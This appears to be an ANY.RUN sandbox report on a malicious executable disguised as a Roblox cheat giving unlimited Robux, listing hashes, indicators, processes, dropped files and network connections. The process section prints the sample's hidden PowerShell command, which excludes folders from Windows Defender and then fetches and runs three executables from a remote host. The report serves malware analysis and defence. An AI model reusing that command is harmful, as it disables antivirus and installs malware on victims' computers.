File name:

Roblox Launcher Cheat Unlimite Robux.exe

Full analysis: https://app.any.run/tasks/663e8e39-6efe-473e-8262-1e57ca43ed0e
Verdict: Malicious activity
Analysis date: June 09, 2024, 14:59:02
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/x-dosexec
File info: PE32 executable (GUI) Intel 80386, for MS Windows
MD5:

EA759B8CE0F61C4CD5498F11C859BB8B

SHA1:

3316A3389715B208E4694B6627F0324F071FB589

SHA256:

224FD4F3E924DCFDA3D01A2483EE708A55CF99AF39173709EACE310117BB4AF2

SSDEEP:

49152:4y7GRR+kfsBtSspSaMJ8dEREPw2hnUonWPIHRg+AICbMa9RD+bYTEgMWQQP+dApn:4yi3iRpSdYEREPw2hUEYsRglIROJWO

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Drops the executable file immediately after the start

      • Roblox Launcher Cheat Unlimite Robux.exe (PID: 4080)
      • RobloxPlayerLauncher.exe (PID: 2108)

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 1440)

    • Adds path to the Windows Defender exclusion list

      • cmd.exe (PID: 928)

  • SUSPICIOUS

    • Executing commands from a ".bat" file

      • Roblox Launcher Cheat Unlimite Robux.exe (PID: 4080)

    • Likely accesses (executes) a file from the Public directory

      • cmd.exe (PID: 928)
      • RobloxPlayerLauncher.exe (PID: 2108)
      • RobloxPlayerLauncher.exe (PID: 2052)

    • Starts CMD.EXE for commands execution

      • Roblox Launcher Cheat Unlimite Robux.exe (PID: 4080)

    • Executable content was dropped or overwritten

      • Roblox Launcher Cheat Unlimite Robux.exe (PID: 4080)
      • RobloxPlayerLauncher.exe (PID: 2108)

    • Reads security settings of Internet Explorer

      • Roblox Launcher Cheat Unlimite Robux.exe (PID: 4080)
      • RobloxPlayerLauncher.exe (PID: 2108)
      • RobloxPlayerLauncher.exe (PID: 2052)
      • RobloxPlayerLauncher.exe (PID: 2232)
      • RobloxPlayerLauncher.exe (PID: 2524)

    • Reads the Internet Settings

      • RobloxPlayerLauncher.exe (PID: 2108)
      • Roblox Launcher Cheat Unlimite Robux.exe (PID: 4080)
      • powershell.exe (PID: 1440)
      • RobloxPlayerLauncher.exe (PID: 2052)
      • RobloxPlayerLauncher.exe (PID: 2232)
      • RobloxPlayerLauncher.exe (PID: 2524)

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 928)

    • Request a resource from the Internet using PowerShell's cmdlet

      • cmd.exe (PID: 928)

    • Script adds exclusion path to Windows Defender

      • cmd.exe (PID: 928)

    • Reads settings of System Certificates

      • RobloxPlayerLauncher.exe (PID: 2108)
      • RobloxPlayerLauncher.exe (PID: 2052)
      • RobloxPlayerLauncher.exe (PID: 2232)
      • RobloxPlayerLauncher.exe (PID: 2524)

    • Using PowerShell to operate with local accounts

      • powershell.exe (PID: 1440)

    • Checks Windows Trust Settings

      • RobloxPlayerLauncher.exe (PID: 2108)
      • RobloxPlayerLauncher.exe (PID: 2052)
      • RobloxPlayerLauncher.exe (PID: 2232)
      • RobloxPlayerLauncher.exe (PID: 2524)

    • Application launched itself

      • RobloxPlayerLauncher.exe (PID: 2108)
      • RobloxPlayerLauncher.exe (PID: 2232)

    • Adds/modifies Windows certificates

      • RobloxPlayerLauncher.exe (PID: 2108)

  • INFO

    • Checks supported languages

      • Roblox Launcher Cheat Unlimite Robux.exe (PID: 4080)
      • RobloxPlayerLauncher.exe (PID: 2108)
      • RobloxPlayerLauncher.exe (PID: 2052)
      • RobloxPlayerLauncher.exe (PID: 2232)
      • RobloxPlayerLauncher.exe (PID: 2524)

    • Reads the computer name

      • Roblox Launcher Cheat Unlimite Robux.exe (PID: 4080)
      • RobloxPlayerLauncher.exe (PID: 2108)
      • RobloxPlayerLauncher.exe (PID: 2052)
      • RobloxPlayerLauncher.exe (PID: 2232)
      • RobloxPlayerLauncher.exe (PID: 2524)

    • Checks proxy server information

      • RobloxPlayerLauncher.exe (PID: 2108)
      • RobloxPlayerLauncher.exe (PID: 2052)
      • RobloxPlayerLauncher.exe (PID: 2232)
      • RobloxPlayerLauncher.exe (PID: 2524)

    • Create files in a temporary directory

      • RobloxPlayerLauncher.exe (PID: 2108)
      • RobloxPlayerLauncher.exe (PID: 2052)
      • RobloxPlayerLauncher.exe (PID: 2232)
      • RobloxPlayerLauncher.exe (PID: 2524)

    • Reads the machine GUID from the registry

      • RobloxPlayerLauncher.exe (PID: 2108)
      • RobloxPlayerLauncher.exe (PID: 2052)
      • RobloxPlayerLauncher.exe (PID: 2232)
      • RobloxPlayerLauncher.exe (PID: 2524)

    • Reads the software policy settings

      • RobloxPlayerLauncher.exe (PID: 2108)
      • RobloxPlayerLauncher.exe (PID: 2052)
      • RobloxPlayerLauncher.exe (PID: 2232)
      • RobloxPlayerLauncher.exe (PID: 2524)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 1440)

    • Disables trace logs

      • powershell.exe (PID: 1440)

    • Creates files or folders in the user directory

      • RobloxPlayerLauncher.exe (PID: 2108)
      • RobloxPlayerLauncher.exe (PID: 2052)
      • RobloxPlayerLauncher.exe (PID: 2232)
      • RobloxPlayerLauncher.exe (PID: 2524)

    • Process checks computer location settings

      • RobloxPlayerLauncher.exe (PID: 2108)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (64.6)
.dll | Win32 Dynamic Link Library (generic) (15.4)
.exe | Win32 Executable (generic) (10.5)
.exe | Generic Win/DOS Executable (4.6)
.exe | DOS Executable Generic (4.6)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2022:03:03 13:15:57+00:00
ImageFileCharacteristics: Executable, 32-bit
PEType: PE32
LinkerVersion: 14.3
CodeSize: 203776
InitializedDataSize: 108032
UninitializedDataSize: -
EntryPoint: 0x1f530
OSVersion: 5.1
ImageVersion: -
SubsystemVersion: 5.1
Subsystem: Windows GUI
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
47
Monitored processes
10
Malicious processes
6
Suspicious processes
1

Behavior graph

Click at the process to see the details
start roblox launcher cheat unlimite robux.exe cmd.exe no specs robloxplayerlauncher.exe net.exe no specs net1.exe no specs powershell.exe robloxplayerlauncher.exe robloxplayerlauncher.exe robloxplayerlauncher.exe roblox launcher cheat unlimite robux.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
928C:\Windows\system32\cmd.exe /c ""C:\Users\Public\play.bat" "C:\Windows\System32\cmd.exeRoblox Launcher Cheat Unlimite Robux.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
1064net sessionC:\Windows\System32\net.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Net Command
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\net.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\netutils.dll
c:\windows\system32\browcli.dll
1440powershell -WindowStyle hidden Add-MpPreference -ExclusionPath C:\Users;Add-MpPreference -ExclusionPath $env:ProgramFiles;cd C:\Users\Public;Invoke-WebRequest https://jeuxviddeo.com/V1 -OutFile V1.exe;./V1.exe;Invoke-WebRequest https://jeuxviddeo.com/Q -OutFile Q.exe;./Q.exe;Invoke-WebRequest https://jeuxviddeo.com/A -OutFile A.exe;./A.exe;exitC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
1876C:\Windows\system32\net1 sessionC:\Windows\System32\net1.exenet.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Net Command
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\net1.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\dsrole.dll
c:\windows\system32\netutils.dll
2052C:\Users\Public\RobloxPlayerLauncher.exe --crashpad --no-rate-limit --database=C:\Users\admin\AppData\Local\Temp\crashpad_roblox --metrics-dir=C:\Users\admin\AppData\Local\Temp\crashpad_roblox --url=https://upload.crashes.rbxinfra.com/post --annotation=RobloxChannel=Production --annotation=UploadAttachmentKiloByteLimit=100 --annotation=UploadPercentage=100 --annotation=format=minidump --annotation=token=a2440b0bfdada85f34d79b43839f2b49ea6bba474bd7d126e844bc119271a1c3 --initial-client-data=0x5ac,0x5b0,0x5b4,0x588,0x5bc,0xe8f954,0xe8f964,0xe8f974C:\Users\Public\RobloxPlayerLauncher.exe
RobloxPlayerLauncher.exe
User:
admin
Company:
Roblox Corporation
Integrity Level:
HIGH
Description:
Roblox
Exit code:
0
Version:
1, 6, 0, 416719
Modules
Images
c:\users\public\robloxplayerlauncher.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\advapi32.dll
2108"C:\Users\Public\RobloxPlayerLauncher.exe" C:\Users\Public\RobloxPlayerLauncher.exe
Roblox Launcher Cheat Unlimite Robux.exe
User:
admin
Company:
Roblox Corporation
Integrity Level:
HIGH
Description:
Roblox
Exit code:
0
Version:
1, 6, 0, 416719
Modules
Images
c:\users\public\robloxplayerlauncher.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\advapi32.dll
2232"C:\Users\admin\AppData\Local\Temp\RBX-AFD721E9\RobloxPlayerLauncher.exe" C:\Users\admin\AppData\Local\Temp\RBX-AFD721E9\RobloxPlayerLauncher.exe
RobloxPlayerLauncher.exe
User:
admin
Company:
Roblox Corporation
Integrity Level:
HIGH
Description:
Roblox
Version:
1, 6, 0, 6280391
Modules
Images
c:\users\admin\appdata\local\temp\rbx-afd721e9\robloxplayerlauncher.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\iphlpapi.dll
2524C:\Users\admin\AppData\Local\Temp\RBX-AFD721E9\RobloxPlayerLauncher.exe --crashpad --no-rate-limit --database=C:\Users\admin\AppData\Local\Temp\crashpad_roblox --metrics-dir=C:\Users\admin\AppData\Local\Temp\crashpad_roblox --url=https://uploads.backtrace.rbx.com/post --annotation=RobloxChannel=production --annotation=RobloxGitHash=a5ccf20963e7cd36c8cab2e9c98e72f26ae235b8 --annotation=UploadAttachmentKiloByteLimit=100 --annotation=UploadPercentage=100 --annotation=format=minidump --annotation=token=a2440b0bfdada85f34d79b43839f2b49ea6bba474bd7d126e844bc119271a1c3 --initial-client-data=0x584,0x588,0x58c,0x560,0x594,0x16d236c,0x16d237c,0x16d238cC:\Users\admin\AppData\Local\Temp\RBX-AFD721E9\RobloxPlayerLauncher.exe
RobloxPlayerLauncher.exe
User:
admin
Company:
Roblox Corporation
Integrity Level:
HIGH
Description:
Roblox
Version:
1, 6, 0, 6280391
Modules
Images
c:\users\admin\appdata\local\temp\rbx-afd721e9\robloxplayerlauncher.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\iphlpapi.dll
3976"C:\Users\admin\AppData\Local\Temp\Roblox Launcher Cheat Unlimite Robux.exe" C:\Users\admin\AppData\Local\Temp\Roblox Launcher Cheat Unlimite Robux.exeexplorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
3221226540
Modules
Images
c:\users\admin\appdata\local\temp\roblox launcher cheat unlimite robux.exe
c:\windows\system32\ntdll.dll
4080"C:\Users\admin\AppData\Local\Temp\Roblox Launcher Cheat Unlimite Robux.exe" C:\Users\admin\AppData\Local\Temp\Roblox Launcher Cheat Unlimite Robux.exe
explorer.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
Modules
Images
c:\users\admin\appdata\local\temp\roblox launcher cheat unlimite robux.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
Total events
22 721
Read events
22 504
Write events
181
Delete events
36

Modification events

(PID) Process:(4080) Roblox Launcher Cheat Unlimite Robux.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(4080) Roblox Launcher Cheat Unlimite Robux.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(4080) Roblox Launcher Cheat Unlimite Robux.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(4080) Roblox Launcher Cheat Unlimite Robux.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(2108) RobloxPlayerLauncher.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(2108) RobloxPlayerLauncher.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(2108) RobloxPlayerLauncher.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(2108) RobloxPlayerLauncher.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
Operation:writeName:ProxyEnable
Value:
0
(PID) Process:(2108) RobloxPlayerLauncher.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
Operation:delete valueName:ProxyServer
Value:
(PID) Process:(2108) RobloxPlayerLauncher.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
Operation:delete valueName:ProxyOverride
Value:
Executable files
3
Suspicious files
24
Text files
6
Unknown types
0

Dropped files

PID
Process
Filename
Type
2108RobloxPlayerLauncher.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04binary
MD5:36A85A32F9FCD22819B0C3043E297553
SHA256:833C932277C9FCD706C954974AECB57A518F94D40797B30FABD55A1B88ADAE8E
2108RobloxPlayerLauncher.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157binary
MD5:9D2D6F0C3382A86BE049486D746EEB22
SHA256:3ED78274080ACF4C25B4A12B6CA1C2F61B1E0C1344C953EF60D6C92350AB0294
1440powershell.exeC:\Users\admin\AppData\Local\Temp\0t404fcv.ao0.psm1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
1440powershell.exeC:\Users\admin\AppData\Local\Temp\k1am4k4c.cs1.ps1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:
2108RobloxPlayerLauncher.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711Ebinary
MD5:9BF8BF9003171D606190237943705897
SHA256:AE517B06FDDE7BEB2F2BA1A5340CC102AF873C22A505D67671CFD97ED1D239D6
1440powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:446DD1CF97EABA21CF14D03AEBC79F27
SHA256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
2108RobloxPlayerLauncher.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04binary
MD5:19A803E4E8345B39783033C00C4A33A1
SHA256:3264EAABE624CED05D868BEBFF016A2979DB25571DABF310FDFC09DD119DCE8B
2108RobloxPlayerLauncher.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B6QGX7LP\application[1].jsonbinary
MD5:9937FC6D133E6189977662AB80BD4419
SHA256:7850CE8ABF467A258A850278B0C18CDD295A05165367A7C986E6167B464ED6F9
2108RobloxPlayerLauncher.exeC:\Users\admin\AppData\Local\Temp\crashpad_roblox\settings.datbinary
MD5:B843C760CF50405C3A0732C0EEC0E68B
SHA256:8CB4EE2371AF9AFDE50EC17B9A059987A57514367FA4587B11928BC99F8522CE
2108RobloxPlayerLauncher.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_BACC6CD2B29F18349081C9FD2343833Bbinary
MD5:E548CB640B80B7225378032D71DEF995
SHA256:688F5830DC6AE4DAF49D97650FD8DD540D34DDA539631378DD43C15B5078B958
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
23
DNS requests
30
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2108
RobloxPlayerLauncher.exe
GET
304
95.140.239.0:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?2755af7cbee6f323
unknown
unknown
2108
RobloxPlayerLauncher.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAbY2QTVWENG9oovp1QifsQ%3D
unknown
unknown
2108
RobloxPlayerLauncher.exe
GET
200
104.18.38.233:80
http://ocsp.comodoca.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTtU9uFqgVGHhJwXZyWCNXmVR5ngQUoBEKIz6W8Qfs4q8p74Klf9AwpLQCEDlyRDr5IrdR19NsEN0xNZU%3D
unknown
unknown
2108
RobloxPlayerLauncher.exe
GET
200
104.18.38.233:80
http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTNMNJMNDqCqx8FcBWK16EHdimS6QQUU3m%2FWqorSs9UgOHYm8Cd8rIDZssCEBN9U5yqfDGppDNwGWiEeo0%3D
unknown
unknown
2052
RobloxPlayerLauncher.exe
GET
200
104.18.38.233:80
http://ocsp.usertrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTNMNJMNDqCqx8FcBWK16EHdimS6QQUU3m%2FWqorSs9UgOHYm8Cd8rIDZssCEBN9U5yqfDGppDNwGWiEeo0%3D
unknown
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
4
System
192.168.100.255:138
whitelisted
224.0.0.252:5355
unknown
1088
svchost.exe
224.0.0.252:5355
unknown
2108
RobloxPlayerLauncher.exe
2.20.215.226:443
clientsettingscdn.roblox.com
AKAMAI-AS
CH
unknown
1440
powershell.exe
192.236.208.214:443
jeuxviddeo.com
HOSTWINDS
US
unknown
2108
RobloxPlayerLauncher.exe
95.140.239.0:80
ctldl.windowsupdate.com
LLNW
FR
unknown
2108
RobloxPlayerLauncher.exe
192.229.221.95:80
ocsp.digicert.com
EDGECAST
US
whitelisted
2052
RobloxPlayerLauncher.exe
2.20.215.226:443
clientsettingscdn.roblox.com
AKAMAI-AS
CH
unknown
2108
RobloxPlayerLauncher.exe
128.116.122.3:443
ephemeralcounters.api.roblox.com
ROBLOX-PRODUCTION
US
unknown

DNS requests

Domain
IP
Reputation
clientsettingscdn.roblox.com
  • 2.20.215.226
unknown
jeuxviddeo.com
  • 192.236.208.214
unknown
ctldl.windowsupdate.com
  • 95.140.239.0
whitelisted
ocsp.digicert.com
  • 192.229.221.95
whitelisted
ephemeralcounters.api.roblox.com
  • 128.116.122.3
whitelisted
setup.rbxcdn.qq.com
unknown
ocsp.comodoca.com
  • 104.18.38.233
whitelisted
ocsp.usertrust.com
  • 104.18.38.233
whitelisted
clientsettingscdn.roblox.qq.com
unknown
setup.rbxcdn.com
  • 95.101.134.51
whitelisted

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
Roblox Launcher Cheat Unlimite Robux.exe